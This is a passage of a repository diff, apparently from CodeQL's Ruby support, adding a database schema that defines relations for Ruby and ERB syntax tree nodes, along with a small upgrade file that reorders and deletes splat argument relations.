+ruby_block_parameters_child( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int child: @ruby_block_parameters_child_type ref +); + +ruby_block_parameters_def( + unique int id: @ruby_block_parameters +); + +@ruby_body_statement_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_body_statement, index] +ruby_body_statement_child( + int ruby_body_statement: @ruby_body_statement ref, + int index: int ref, + unique int child: @ruby_body_statement_child_type ref +); + +ruby_body_statement_def( + unique int id: @ruby_body_statement +); + +ruby_break_child( + unique int ruby_break: @ruby_break ref, + unique int child: @ruby_argument_list ref +); + +ruby_break_def( + unique int id: @ruby_break +); + +ruby_call_arguments( + unique int ruby_call: @ruby_call ref, + unique int arguments: @ruby_argument_list ref +); + +@ruby_call_block_type = @ruby_block | @ruby_do_block + +ruby_call_block( + unique int ruby_call: @ruby_call ref, + unique int block: @ruby_call_block_type ref +); + +@ruby_call_method_type = @ruby_token_operator | @ruby_underscore_variable + +ruby_call_method( + unique int ruby_call: @ruby_call ref, + unique int method: @ruby_call_method_type ref +); + +ruby_call_operator( + unique int ruby_call: @ruby_call ref, + unique int operator: @ruby_underscore_call_operator ref +); + +ruby_call_receiver( + unique int ruby_call: @ruby_call ref, + unique int receiver: @ruby_underscore_primary ref +); + +ruby_call_def( + unique int id: @ruby_call +); + +ruby_case_value( + unique int ruby_case__: @ruby_case__ ref, + unique int value: @ruby_underscore_statement ref +); + +@ruby_case_child_type = @ruby_else | @ruby_when + +#keyset[ruby_case__, index] +ruby_case_child( + int ruby_case__: @ruby_case__ ref, + int index: int ref, + unique int child: @ruby_case_child_type ref +); + +ruby_case_def( + unique int id: @ruby_case__ +); + +#keyset[ruby_case_match, index] +ruby_case_match_clauses( + int ruby_case_match: @ruby_case_match ref, + int index: int ref, + unique int clauses: @ruby_in_clause ref +); + +ruby_case_match_else( + unique int ruby_case_match: @ruby_case_match ref, + unique int else: @ruby_else ref +); + +ruby_case_match_def( + unique int id: @ruby_case_match, + int value: @ruby_underscore_statement ref +); + +#keyset[ruby_chained_string, index] +ruby_chained_string_child( + int ruby_chained_string: @ruby_chained_string ref, + int index: int ref, + unique int child: @ruby_string__ ref +); + +ruby_chained_string_def( + unique int id: @ruby_chained_string +); + +ruby_class_body( + unique int ruby_class: @ruby_class ref, + unique int body: @ruby_body_statement ref +); + +@ruby_class_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_class_superclass( + unique int ruby_class: @ruby_class ref, + unique int superclass: @ruby_superclass ref +); + +ruby_class_def( + unique int id: @ruby_class, + int name: @ruby_class_name_type ref +); + +@ruby_complex_child_type = @ruby_rational | @ruby_token_float | @ruby_token_integer + +ruby_complex_def( + unique int id: @ruby_complex, + int child: @ruby_complex_child_type ref +); + +ruby_conditional_def( + unique int id: @ruby_conditional, + int alternative: @ruby_underscore_arg ref, + int condition: @ruby_underscore_arg ref, + int consequence: @ruby_underscore_arg ref +); + +@ruby_delimited_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_delimited_symbol, index] +ruby_delimited_symbol_child( + int ruby_delimited_symbol: @ruby_delimited_symbol ref, + int index: int ref, + unique int child: @ruby_delimited_symbol_child_type ref +); + +ruby_delimited_symbol_def( + unique int id: @ruby_delimited_symbol +); + +@ruby_destructured_left_assignment_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_destructured_left_assignment, index] +ruby_destructured_left_assignment_child( + int ruby_destructured_left_assignment: @ruby_destructured_left_assignment ref, + int index: int ref, + unique int child: @ruby_destructured_left_assignment_child_type ref +); + +ruby_destructured_left_assignment_def( + unique int id: @ruby_destructured_left_assignment +); + +@ruby_destructured_parameter_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_destructured_parameter, index] +ruby_destructured_parameter_child( + int ruby_destructured_parameter: @ruby_destructured_parameter ref, + int index: int ref, + unique int child: @ruby_destructured_parameter_child_type ref +); + +ruby_destructured_parameter_def( + unique int id: @ruby_destructured_parameter +); + +@ruby_do_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_do, index] +ruby_do_child( + int ruby_do: @ruby_do ref, + int index: int ref, + unique int child: @ruby_do_child_type ref +); + +ruby_do_def( + unique int id: @ruby_do +); + +ruby_do_block_body( + unique int ruby_do_block: @ruby_do_block ref, + unique int body: @ruby_body_statement ref +); + +ruby_do_block_parameters( + unique int ruby_do_block: @ruby_do_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_do_block_def( + unique int id: @ruby_do_block +); + +@ruby_element_reference_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_element_reference, index] +ruby_element_reference_child( + int ruby_element_reference: @ruby_element_reference ref, + int index: int ref, + unique int child: @ruby_element_reference_child_type ref +); + +ruby_element_reference_def( + unique int id: @ruby_element_reference, + int object: @ruby_underscore_primary ref +); + +@ruby_else_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_else, index] +ruby_else_child( + int ruby_else: @ruby_else ref, + int index: int ref, + unique int child: @ruby_else_child_type ref +); + +ruby_else_def( + unique int id: @ruby_else +); + +@ruby_elsif_alternative_type = @ruby_else | @ruby_elsif + +ruby_elsif_alternative( + unique int ruby_elsif: @ruby_elsif ref, + unique int alternative: @ruby_elsif_alternative_type ref +); + +ruby_elsif_consequence( + unique int ruby_elsif: @ruby_elsif ref, + unique int consequence: @ruby_then ref +); + +ruby_elsif_def( + unique int id: @ruby_elsif, + int condition: @ruby_underscore_statement ref +); + +@ruby_end_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_end_block, index] +ruby_end_block_child( + int ruby_end_block: @ruby_end_block ref, + int index: int ref, + unique int child: @ruby_end_block_child_type ref +); + +ruby_end_block_def( + unique int id: @ruby_end_block +); + +@ruby_ensure_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_ensure, index] +ruby_ensure_child( + int ruby_ensure: @ruby_ensure ref, + int index: int ref, + unique int child: @ruby_ensure_child_type ref +); + +ruby_ensure_def( + unique int id: @ruby_ensure +); + +ruby_exception_variable_def( + unique int id: @ruby_exception_variable, + int child: @ruby_underscore_lhs ref +); + +@ruby_exceptions_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_exceptions, index] +ruby_exceptions_child( + int ruby_exceptions: @ruby_exceptions ref, + int index: int ref, + unique int child: @ruby_exceptions_child_type ref +); + +ruby_exceptions_def( + unique int id: @ruby_exceptions +); + +ruby_expression_reference_pattern_def( + unique int id: @ruby_expression_reference_pattern, + int value: @ruby_underscore_expression ref +); + +ruby_find_pattern_class( + unique int ruby_find_pattern: @ruby_find_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_find_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_find_pattern, index] +ruby_find_pattern_child( + int ruby_find_pattern: @ruby_find_pattern ref, + int index: int ref, + unique int child: @ruby_find_pattern_child_type ref +); + +ruby_find_pattern_def( + unique int id: @ruby_find_pattern +); + +@ruby_for_pattern_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +ruby_for_def( + unique int id: @ruby_for, + int body: @ruby_do ref, + int pattern: @ruby_for_pattern_type ref, + int value: @ruby_in ref +); + +@ruby_hash_child_type = @ruby_hash_splat_argument | @ruby_pair + +#keyset[ruby_hash, index] +ruby_hash_child( + int ruby_hash: @ruby_hash ref, + int index: int ref, + unique int child: @ruby_hash_child_type ref +); + +ruby_hash_def( + unique int id: @ruby_hash +); + +ruby_hash_pattern_class( + unique int ruby_hash_pattern: @ruby_hash_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_hash_pattern_child_type = @ruby_hash_splat_parameter | @ruby_keyword_pattern | @ruby_token_hash_splat_nil + +#keyset[ruby_hash_pattern, index] +ruby_hash_pattern_child( + int ruby_hash_pattern: @ruby_hash_pattern ref, + int index: int ref, + unique int child: @ruby_hash_pattern_child_type ref +); + +ruby_hash_pattern_def( + unique int id: @ruby_hash_pattern +); + +ruby_hash_splat_argument_def( + unique int id: @ruby_hash_splat_argument, + int child: @ruby_underscore_arg ref +); + +ruby_hash_splat_parameter_name( + unique int ruby_hash_splat_parameter: @ruby_hash_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_hash_splat_parameter_def( + unique int id: @ruby_hash_splat_parameter +); + +@ruby_heredoc_body_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_heredoc_content | @ruby_token_heredoc_end + +#keyset[ruby_heredoc_body, index] +ruby_heredoc_body_child( + int ruby_heredoc_body: @ruby_heredoc_body ref, + int index: int ref, + unique int child: @ruby_heredoc_body_child_type ref +); + +ruby_heredoc_body_def( + unique int id: @ruby_heredoc_body +); + +@ruby_if_alternative_type = @ruby_else | @ruby_elsif + +ruby_if_alternative( + unique int ruby_if: @ruby_if ref, + unique int alternative: @ruby_if_alternative_type ref +); + +ruby_if_consequence( + unique int ruby_if: @ruby_if ref, + unique int consequence: @ruby_then ref +); + +ruby_if_def( + unique int id: @ruby_if, + int condition: @ruby_underscore_statement ref +); + +ruby_if_guard_def( + unique int id: @ruby_if_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_if_modifier_def( + unique int id: @ruby_if_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_in_def( + unique int id: @ruby_in, + int child: @ruby_underscore_arg ref +); + +ruby_in_clause_body( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int body: @ruby_then ref +); + +@ruby_in_clause_guard_type = @ruby_if_guard | @ruby_unless_guard + +ruby_in_clause_guard( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int guard: @ruby_in_clause_guard_type ref +); + +ruby_in_clause_def( + unique int id: @ruby_in_clause, + int pattern: @ruby_underscore_pattern_top_expr_body ref +); + +@ruby_interpolation_child_type = @ruby_token_empty_statement | @ruby_underscore_nonlocal_variable | @ruby_underscore_statement + +#keyset[ruby_interpolation, index] +ruby_interpolation_child( + int ruby_interpolation: @ruby_interpolation ref, + int index: int ref, + unique int child: @ruby_interpolation_child_type ref +); + +ruby_interpolation_def( + unique int id: @ruby_interpolation +); + +ruby_keyword_parameter_value( + unique int ruby_keyword_parameter: @ruby_keyword_parameter ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_keyword_parameter_def( + unique int id: @ruby_keyword_parameter, + int name: @ruby_token_identifier ref +); + +@ruby_keyword_pattern_key_type = @ruby_string__ | @ruby_token_hash_key_symbol + +ruby_keyword_pattern_value( + unique int ruby_keyword_pattern: @ruby_keyword_pattern ref, + unique int value: @ruby_underscore_pattern_expr ref +); + +ruby_keyword_pattern_def( + unique int id: @ruby_keyword_pattern, + int key__: @ruby_keyword_pattern_key_type ref +); + +@ruby_lambda_body_type = @ruby_block | @ruby_do_block + +ruby_lambda_parameters( + unique int ruby_lambda: @ruby_lambda ref, + unique int parameters: @ruby_lambda_parameters ref +); + +ruby_lambda_def( + unique int id: @ruby_lambda, + int body: @ruby_lambda_body_type ref +); + +@ruby_lambda_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_lambda_parameters, index] +ruby_lambda_parameters_child( + int ruby_lambda_parameters: @ruby_lambda_parameters ref, + int index: int ref, + unique int child: @ruby_lambda_parameters_child_type ref +); + +ruby_lambda_parameters_def( + unique int id: @ruby_lambda_parameters +); + +@ruby_left_assignment_list_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_left_assignment_list, index] +ruby_left_assignment_list_child( + int ruby_left_assignment_list: @ruby_left_assignment_list ref, + int index: int ref, + unique int child: @ruby_left_assignment_list_child_type ref +); + +ruby_left_assignment_list_def( + unique int id: @ruby_left_assignment_list +); + +@ruby_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_method_body( + unique int ruby_method: @ruby_method ref, + unique int body: @ruby_method_body_type ref +); + +ruby_method_parameters( + unique int ruby_method: @ruby_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_method_def( + unique int id: @ruby_method, + int name: @ruby_underscore_method_name ref +); + +@ruby_method_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_method_parameters, index] +ruby_method_parameters_child( + int ruby_method_parameters: @ruby_method_parameters ref, + int index: int ref, + unique int child: @ruby_method_parameters_child_type ref +); + +ruby_method_parameters_def( + unique int id: @ruby_method_parameters +); + +ruby_module_body( + unique int ruby_module: @ruby_module ref, + unique int body: @ruby_body_statement ref +); + +@ruby_module_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_module_def( + unique int id: @ruby_module, + int name: @ruby_module_name_type ref +); + +ruby_next_child( + unique int ruby_next: @ruby_next ref, + unique int child: @ruby_argument_list ref +); + +ruby_next_def( + unique int id: @ruby_next +); + +case @ruby_operator_assignment.operator of + 0 = @ruby_operator_assignment_percentequal +| 1 = @ruby_operator_assignment_ampersandampersandequal +| 2 = @ruby_operator_assignment_ampersandequal +| 3 = @ruby_operator_assignment_starstarequal +| 4 = @ruby_operator_assignment_starequal +| 5 = @ruby_operator_assignment_plusequal +| 6 = @ruby_operator_assignment_minusequal +| 7 = @ruby_operator_assignment_slashequal +| 8 = @ruby_operator_assignment_langlelangleequal +| 9 = @ruby_operator_assignment_ranglerangleequal +| 10 = @ruby_operator_assignment_caretequal +| 11 = @ruby_operator_assignment_pipeequal +| 12 = @ruby_operator_assignment_pipepipeequal +; + + +@ruby_operator_assignment_right_type = @ruby_rescue_modifier | @ruby_underscore_expression + +ruby_operator_assignment_def( + unique int id: @ruby_operator_assignment, + int left: @ruby_underscore_lhs ref, + int operator: int ref, + int right: @ruby_operator_assignment_right_type ref +); + +ruby_optional_parameter_def( + unique int id: @ruby_optional_parameter, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_arg ref +); + +@ruby_pair_key_type = @ruby_string__ | @ruby_token_hash_key_symbol | @ruby_underscore_arg + +ruby_pair_value( + unique int ruby_pair: @ruby_pair ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_pair_def( + unique int id: @ruby_pair, + int key__: @ruby_pair_key_type ref +); + +ruby_parenthesized_pattern_def( + unique int id: @ruby_parenthesized_pattern, + int child: @ruby_underscore_pattern_expr ref +); + +@ruby_parenthesized_statements_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_parenthesized_statements, index] +ruby_parenthesized_statements_child( + int ruby_parenthesized_statements: @ruby_parenthesized_statements ref, + int index: int ref, + unique int child: @ruby_parenthesized_statements_child_type ref +); + +ruby_parenthesized_statements_def( + unique int id: @ruby_parenthesized_statements +); + +@ruby_pattern_child_type = @ruby_splat_argument | @ruby_underscore_arg + +ruby_pattern_def( + unique int id: @ruby_pattern, + int child: @ruby_pattern_child_type ref +); + +@ruby_program_child_type = @ruby_token_empty_statement | @ruby_token_uninterpreted | @ruby_underscore_statement + +#keyset[ruby_program, index] +ruby_program_child( + int ruby_program: @ruby_program ref, + int index: int ref, + unique int child: @ruby_program_child_type ref +); + +ruby_program_def( + unique int id: @ruby_program +); + +@ruby_range_begin_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_begin( + unique int ruby_range: @ruby_range ref, + unique int begin: @ruby_range_begin_type ref +); + +@ruby_range_end_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_end( + unique int ruby_range: @ruby_range ref, + unique int end: @ruby_range_end_type ref +); + +case @ruby_range.operator of + 0 = @ruby_range_dotdot +| 1 = @ruby_range_dotdotdot +; + + +ruby_range_def( + unique int id: @ruby_range, + int operator: int ref +); + +@ruby_rational_child_type = @ruby_token_float | @ruby_token_integer + +ruby_rational_def( + unique int id: @ruby_rational, + int child: @ruby_rational_child_type ref +); + +ruby_redo_child( + unique int ruby_redo: @ruby_redo ref, + unique int child: @ruby_argument_list ref +); + +ruby_redo_def( + unique int id: @ruby_redo +); + +@ruby_regex_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_regex, index] +ruby_regex_child( + int ruby_regex: @ruby_regex ref, + int index: int ref, + unique int child: @ruby_regex_child_type ref +); + +ruby_regex_def( + unique int id: @ruby_regex +); + +ruby_rescue_body( + unique int ruby_rescue: @ruby_rescue ref, + unique int body: @ruby_then ref +); + +ruby_rescue_exceptions( + unique int ruby_rescue: @ruby_rescue ref, + unique int exceptions: @ruby_exceptions ref +); + +ruby_rescue_variable( + unique int ruby_rescue: @ruby_rescue ref, + unique int variable: @ruby_exception_variable ref +); + +ruby_rescue_def( + unique int id: @ruby_rescue +); + +@ruby_rescue_modifier_body_type = @ruby_underscore_arg | @ruby_underscore_statement + +ruby_rescue_modifier_def( + unique int id: @ruby_rescue_modifier, + int body: @ruby_rescue_modifier_body_type ref, + int handler: @ruby_underscore_expression ref +); + +ruby_rest_assignment_child( + unique int ruby_rest_assignment: @ruby_rest_assignment ref, + unique int child: @ruby_underscore_lhs ref +); + +ruby_rest_assignment_def( + unique int id: @ruby_rest_assignment +); + +ruby_retry_child( + unique int ruby_retry: @ruby_retry ref, + unique int child: @ruby_argument_list ref +); + +ruby_retry_def( + unique int id: @ruby_retry +); + +ruby_return_child( + unique int ruby_return: @ruby_return ref, + unique int child: @ruby_argument_list ref +); + +ruby_return_def( + unique int id: @ruby_return +); + +@ruby_right_assignment_list_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_right_assignment_list, index] +ruby_right_assignment_list_child( + int ruby_right_assignment_list: @ruby_right_assignment_list ref, + int index: int ref, + unique int child: @ruby_right_assignment_list_child_type ref +); + +ruby_right_assignment_list_def( + unique int id: @ruby_right_assignment_list +); + +@ruby_scope_resolution_scope_type = @ruby_underscore_pattern_constant | @ruby_underscore_primary + +ruby_scope_resolution_scope( + unique int ruby_scope_resolution: @ruby_scope_resolution ref, + unique int scope: @ruby_scope_resolution_scope_type ref +); + +ruby_scope_resolution_def( + unique int id: @ruby_scope_resolution, + int name: @ruby_token_constant ref +); + +ruby_setter_def( + unique int id: @ruby_setter, + int name: @ruby_token_identifier ref +); + +ruby_singleton_class_body( + unique int ruby_singleton_class: @ruby_singleton_class ref, + unique int body: @ruby_body_statement ref +); + +ruby_singleton_class_def( + unique int id: @ruby_singleton_class, + int value: @ruby_underscore_arg ref +); + +@ruby_singleton_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_singleton_method_body( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int body: @ruby_singleton_method_body_type ref +); + +@ruby_singleton_method_object_type = @ruby_underscore_arg | @ruby_underscore_variable + +ruby_singleton_method_parameters( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_singleton_method_def( + unique int id: @ruby_singleton_method, + int name: @ruby_underscore_method_name ref, + int object: @ruby_singleton_method_object_type ref +); + +ruby_splat_argument_def( + unique int id: @ruby_splat_argument, + int child: @ruby_underscore_arg ref +); + +ruby_splat_parameter_name( + unique int ruby_splat_parameter: @ruby_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_splat_parameter_def( + unique int id: @ruby_splat_parameter +); + +@ruby_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_string__, index] +ruby_string_child( + int ruby_string__: @ruby_string__ ref, + int index: int ref, + unique int child: @ruby_string_child_type ref +); + +ruby_string_def( + unique int id: @ruby_string__ +); + +#keyset[ruby_string_array, index] +ruby_string_array_child( + int ruby_string_array: @ruby_string_array ref, + int index: int ref, + unique int child: @ruby_bare_string ref +); + +ruby_string_array_def( + unique int id: @ruby_string_array +); + +@ruby_subshell_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_subshell, index] +ruby_subshell_child( + int ruby_subshell: @ruby_subshell ref, + int index: int ref, + unique int child: @ruby_subshell_child_type ref +); + +ruby_subshell_def( + unique int id: @ruby_subshell +); + +ruby_superclass_def( + unique int id: @ruby_superclass, + int child: @ruby_underscore_expression ref +); + +#keyset[ruby_symbol_array, index] +ruby_symbol_array_child( + int ruby_symbol_array: @ruby_symbol_array ref, + int index: int ref, + unique int child: @ruby_bare_symbol ref +); + +ruby_symbol_array_def( + unique int id: @ruby_symbol_array +); + +@ruby_then_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_then, index] +ruby_then_child( + int ruby_then: @ruby_then ref, + int index: int ref, + unique int child: @ruby_then_child_type ref +); + +ruby_then_def( + unique int id: @ruby_then +); + +@ruby_unary_operand_type = @ruby_parenthesized_statements | @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_unary.operator of + 0 = @ruby_unary_bang +| 1 = @ruby_unary_plus +| 2 = @ruby_unary_minus +| 3 = @ruby_unary_definedquestion +| 4 = @ruby_unary_not +| 5 = @ruby_unary_tilde +; + + +ruby_unary_def( + unique int id: @ruby_unary, + int operand: @ruby_unary_operand_type ref, + int operator: int ref +); + +#keyset[ruby_undef, index] +ruby_undef_child( + int ruby_undef: @ruby_undef ref, + int index: int ref, + unique int child: @ruby_underscore_method_name ref +); + +ruby_undef_def( + unique int id: @ruby_undef +); + +@ruby_unless_alternative_type = @ruby_else | @ruby_elsif + +ruby_unless_alternative( + unique int ruby_unless: @ruby_unless ref, + unique int alternative: @ruby_unless_alternative_type ref +); + +ruby_unless_consequence( + unique int ruby_unless: @ruby_unless ref, + unique int consequence: @ruby_then ref +); + +ruby_unless_def( + unique int id: @ruby_unless, + int condition: @ruby_underscore_statement ref +); + +ruby_unless_guard_def( + unique int id: @ruby_unless_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_unless_modifier_def( + unique int id: @ruby_unless_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_until_def( + unique int id: @ruby_until, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_until_modifier_def( + unique int id: @ruby_until_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +@ruby_variable_reference_pattern_name_type = @ruby_token_identifier | @ruby_underscore_nonlocal_variable + +ruby_variable_reference_pattern_def( + unique int id: @ruby_variable_reference_pattern, + int name: @ruby_variable_reference_pattern_name_type ref +); + +ruby_when_body( + unique int ruby_when: @ruby_when ref, + unique int body: @ruby_then ref +); + +#keyset[ruby_when, index] +ruby_when_pattern( + int ruby_when: @ruby_when ref, + int index: int ref, + unique int pattern: @ruby_pattern ref +); + +ruby_when_def( + unique int id: @ruby_when +); + +ruby_while_def( + unique int id: @ruby_while, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_while_modifier_def( + unique int id: @ruby_while_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_yield_child( + unique int ruby_yield: @ruby_yield ref, + unique int child: @ruby_argument_list ref +); + +ruby_yield_def( + unique int id: @ruby_yield +); + +ruby_tokeninfo( + unique int id: @ruby_token, + int kind: int ref, + string value: string ref +); + +case @ruby_token.kind of + 0 = @ruby_reserved_word +| 1 = @ruby_token_character +| 2 = @ruby_token_class_variable +| 3 = @ruby_token_comment +| 4 = @ruby_token_constant +| 5 = @ruby_token_empty_statement +| 6 = @ruby_token_encoding +| 7 = @ruby_token_escape_sequence +| 8 = @ruby_token_false +| 9 = @ruby_token_file +| 10 = @ruby_token_float +| 11 = @ruby_token_forward_argument +| 12 = @ruby_token_forward_parameter +| 13 = @ruby_token_global_variable +| 14 = @ruby_token_hash_key_symbol +| 15 = @ruby_token_hash_splat_nil +| 16 = @ruby_token_heredoc_beginning +| 17 = @ruby_token_heredoc_content +| 18 = @ruby_token_heredoc_end +| 19 = @ruby_token_identifier +| 20 = @ruby_token_instance_variable +| 21 = @ruby_token_integer +| 22 = @ruby_token_line +| 23 = @ruby_token_nil +| 24 = @ruby_token_operator +| 25 = @ruby_token_self +| 26 = @ruby_token_simple_symbol +| 27 = @ruby_token_string_content +| 28 = @ruby_token_super +| 29 = @ruby_token_true +| 30 = @ruby_token_uninterpreted +; + + +@ruby_ast_node = @ruby_alias | @ruby_alternative_pattern | @ruby_argument_list | @ruby_array | @ruby_array_pattern | @ruby_as_pattern | @ruby_assignment | @ruby_bare_string | @ruby_bare_symbol | @ruby_begin | @ruby_begin_block | @ruby_binary | @ruby_block | @ruby_block_argument | @ruby_block_body | @ruby_block_parameter | @ruby_block_parameters | @ruby_body_statement | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_complex | @ruby_conditional | @ruby_delimited_symbol | @ruby_destructured_left_assignment | @ruby_destructured_parameter | @ruby_do | @ruby_do_block | @ruby_element_reference | @ruby_else | @ruby_elsif | @ruby_end_block | @ruby_ensure | @ruby_exception_variable | @ruby_exceptions | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_for | @ruby_hash | @ruby_hash_pattern | @ruby_hash_splat_argument | @ruby_hash_splat_parameter | @ruby_heredoc_body | @ruby_if | @ruby_if_guard | @ruby_if_modifier | @ruby_in | @ruby_in_clause | @ruby_interpolation | @ruby_keyword_parameter | @ruby_keyword_pattern | @ruby_lambda | @ruby_lambda_parameters | @ruby_left_assignment_list | @ruby_method | @ruby_method_parameters | @ruby_module | @ruby_next | @ruby_operator_assignment | @ruby_optional_parameter | @ruby_pair | @ruby_parenthesized_pattern | @ruby_parenthesized_statements | @ruby_pattern | @ruby_program | @ruby_range | @ruby_rational | @ruby_redo | @ruby_regex | @ruby_rescue | @ruby_rescue_modifier | @ruby_rest_assignment | @ruby_retry | @ruby_return | @ruby_right_assignment_list | @ruby_scope_resolution | @ruby_setter | @ruby_singleton_class | @ruby_singleton_method | @ruby_splat_argument | @ruby_splat_parameter | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_superclass | @ruby_symbol_array | @ruby_then | @ruby_token | @ruby_unary | @ruby_undef | @ruby_unless | @ruby_unless_guard | @ruby_unless_modifier | @ruby_until | @ruby_until_modifier | @ruby_variable_reference_pattern | @ruby_when | @ruby_while | @ruby_while_modifier | @ruby_yield + +@ruby_ast_node_parent = @file | @ruby_ast_node + +#keyset[parent, parent_index] +ruby_ast_node_info( + unique int node: @ruby_ast_node ref, + int parent: @ruby_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + +erb_comment_directive_child( + unique int erb_comment_directive: @erb_comment_directive ref, + unique int child: @erb_token_comment ref +); + +erb_comment_directive_def( + unique int id: @erb_comment_directive +); + +erb_directive_child( + unique int erb_directive: @erb_directive ref, + unique int child: @erb_token_code ref +); + +erb_directive_def( + unique int id: @erb_directive +); + +erb_graphql_directive_child( + unique int erb_graphql_directive: @erb_graphql_directive ref, + unique int child: @erb_token_code ref +); + +erb_graphql_directive_def( + unique int id: @erb_graphql_directive +); + +erb_output_directive_child( + unique int erb_output_directive: @erb_output_directive ref, + unique int child: @erb_token_code ref +); + +erb_output_directive_def( + unique int id: @erb_output_directive +); + +@erb_template_child_type = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_token_content + +#keyset[erb_template, index] +erb_template_child( + int erb_template: @erb_template ref, + int index: int ref, + unique int child: @erb_template_child_type ref +); + +erb_template_def( + unique int id: @erb_template +); + +erb_tokeninfo( + unique int id: @erb_token, + int kind: int ref, + string value: string ref +); + +case @erb_token.kind of + 0 = @erb_reserved_word +| 1 = @erb_token_code +| 2 = @erb_token_comment +| 3 = @erb_token_content +; + + +@erb_ast_node = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_template | @erb_token + +@erb_ast_node_parent = @erb_ast_node | @file + +#keyset[parent, parent_index] +erb_ast_node_info( + unique int node: @erb_ast_node ref, + int parent: @erb_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + diff --git a/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/upgrade.properties b/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/upgrade.properties new file mode 100644 index 00000000000..e85392d8db2 --- /dev/null +++ b/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/upgrade.properties @@ -0,0 +1,6 @@ +description: Update grammar +compatibility: backwards +ruby_splat_argument_def.rel: reorder ruby_splat_argument_child.rel ( int id, int child) id child +ruby_splat_argument_child.rel: delete +ruby_hash_splat_argument_def.rel: reorder ruby_hash_splat_argument_child.rel ( int id, int child) id child +ruby_hash_splat_argument_child.rel: delete diff --git a/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/old.dbscheme b/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/old.dbscheme new file mode 100644 index 00000000000..3595c826de6 --- /dev/null +++ 